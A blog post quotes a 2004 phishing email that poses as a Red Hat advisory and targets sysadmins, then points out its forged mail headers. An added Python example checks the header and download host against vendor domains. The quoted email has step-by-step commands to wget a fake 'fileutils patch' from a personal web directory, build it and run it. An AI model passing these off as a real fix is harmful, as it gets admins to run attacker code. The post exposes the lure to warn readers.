Redhat Phish
Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
- First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
- make
- ./inst
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Very credible looking, except for a few little niggles:
Received: from mail.forcartex.com.tw (unknown
[211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id
A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004
03:11:53 -0400 (EDT)
Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail — the HTML links to Redhat’s real logo, linked from a Redhat server, and they even ran their HTML through Tidy!
Let’s be careful out there!
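The niggles above can be checked mechanically. The following is an added example, not part of the original post: it audits the topmost Received header (the one written by the receiving Postfix server) and the download step against a list of vendor domains. The function names and the choice of redhat.com as the vendor domain are assumptions made for illustration.

```python
import re
from email import message_from_string

# Constructed sample: only the Received header and download step quoted in the post.
SAMPLE = (
    "Received: from mail.forcartex.com.tw (unknown\n"
    " [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id\n"
    " A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004\n"
    " 03:11:53 -0400 (EDT)\n"
    "\n"
    "First download the patch from the Stanford RedHat mirror: "
    "wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz\n"
)

# Postfix format: from <HELO name> (<reverse DNS name or "unknown"> [<client IP>])
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s*\[([0-9a-fA-F.:]+)\]\)")
# A hostname followed by a path, with or without a scheme in front.
URL_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(/\S*)", re.I)

def in_domain(host, domains):
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)

def audit(raw, vendor_domains):
    """Return a list of reasons the message does not look like vendor mail."""
    msg = message_from_string(raw)
    findings = []
    received = msg.get_all("Received") or []
    if received:
        # Only the topmost hop was recorded by our own MTA; lower ones can be forged.
        hop = " ".join(received[0].split())  # unfold the wrapped header
        m = RECEIVED_RE.search(hop)
        if m:
            helo, rdns, ip = m.groups()
            if not in_domain(helo, vendor_domains):
                findings.append(f"relay {helo} [{ip}] is not a vendor host")
            if rdns == "unknown":
                findings.append(f"no verified reverse DNS for {ip}")
    for host, path in URL_RE.findall(msg.get_payload()):
        if not in_domain(host, vendor_domains):
            findings.append(f"download host {host} is outside vendor domains")
        if path.startswith("/~"):
            findings.append(f"download path {path} is a personal user directory")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE, ["redhat.com"]):  # vendor domain is an assumption
        print(finding)
```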